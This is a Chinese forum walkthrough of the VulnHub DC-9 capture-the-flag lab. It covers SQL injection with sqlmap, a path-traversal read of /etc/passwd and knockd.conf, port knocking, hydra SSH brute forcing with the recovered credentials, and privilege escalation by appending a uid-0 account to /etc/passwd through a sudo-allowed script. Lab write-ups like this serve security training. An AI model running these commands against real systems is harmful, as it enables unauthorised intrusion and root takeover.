vulnhub系列:DC-9

打印 上一主题 下一主题

主题 1024|帖子 1024|积分 3072

vulnhub系列:DC-9

靶机下载
一、信息网络

nmap扫描存活,根据mac地址寻找IP
  1. nmap 192.168.23.0/24
复制代码

nmap扫描IP 端口等信息
  1. nmap 192.168.23.144 -p- -sV -Pn -O
复制代码

访问80端口

dirsearch目录扫描
  1. python3 dirsearch.py -u http://192.168.23.144/
复制代码

页面查看,发现搜索框

发现登录框

sqlmap 工具跑一下,搜索框存在sql注入

库名

users下表名

UserDetails下字段

爆数据

登录框实验,发现无法登录
爆一下另一个数据库Staff
表名

字段

数据

得到admin账号、密码,将密码举行md5解密
  1. transorbital1
复制代码

登录admin账户

发现多了一个add record功能
之后没什么发现,拼接一下目录扫描的文件,也没什么发现
看到页面中显示文件不存在,大概存在文件包含,实验在当前url路径拼接
  1. ?file=../../../../..//etc/passwd
复制代码

一些报告提到hnockd服务
  1. 敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来“关门”,将端口关闭,不对外监听,进一步提升了服务和系统的安全性
复制代码
默认配置文件
  1. /etc/knockd.conf
复制代码
通过文件包含查看其内容

根据文档,依次举行"敲门"
  1. nmap 192.168.23.144 -p 7469
  2. nmap 192.168.23.144 -p 8475
  3. nmap 192.168.23.144 -p 9842
复制代码

再次扫描端口发现ssh服务已开启

二、getshell

将之前sql注入时得到的账号写入user.txt文件,密码写入pass.txt文件,使用hydra工具举行爆破
  1. hydra -L user.txt -P pass.txt 192.168.23.144 ssh
复制代码
得到以下结果
  1. chandlerb                UrAG0D!
  2. joeyt                        Passw0rd
  3. janitor                        Ilovepeepee
复制代码

依次举行ssh毗连
账号1
  1. ssh chandlerb@192.168.23.144
  2. UrAG0D!
复制代码
没东西

账号2
  1. ssh joeyt@192.168.23.144
  2. Passw0rd
复制代码
也没东西

账号3
  1. ssh janitor@192.168.23.144
  2. Ilovepeepee
复制代码
发现多了一个目录

进入目录查看,发现存在几个密码

将其写入到 pass.txt 中,再次爆破,得到一个新的账号密码
  1. hydra -L user.txt -P pass.txt 192.168.23.144 ssh
  2. fredf:B4-Tru3-001
复制代码

三、提权

ssh 毗连 fredf 用户,毗连成功
  1. ssh fredf@192.168.23.144
复制代码

查看当前目录没什么发现,查看当前权限
  1. sudo -l
复制代码

看到 /opt/devstuff/dist/test/test 能以 root 权限实行,进入目录,test 文件查看是乱码,在 /opt/devstuff 下发现 test.py

查看文件内容

是一个脚本文件,天生一个用户,用root权限实行,将用户写入到 /etc/passwd 中
kali 实行命令
  1. openssl passwd -1 -salt dc9 123456
复制代码

回到 /opt/devstuff/dist/test/ 目录,将账号密码写入 /tmp/dc9,再实行 test,将其写入到 /etc/passwd
  1. echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0::/root:/bin/bash' >> /tmp/dc9
  2. sudo ./test /tmp/dc9 /etc/passwd
复制代码

切换用户到 dc9,提权成功
  1. su dc9
  2. 123456
复制代码

在 root 目录下,发现 theflag.txt,结束


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

大号在练葵花宝典

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表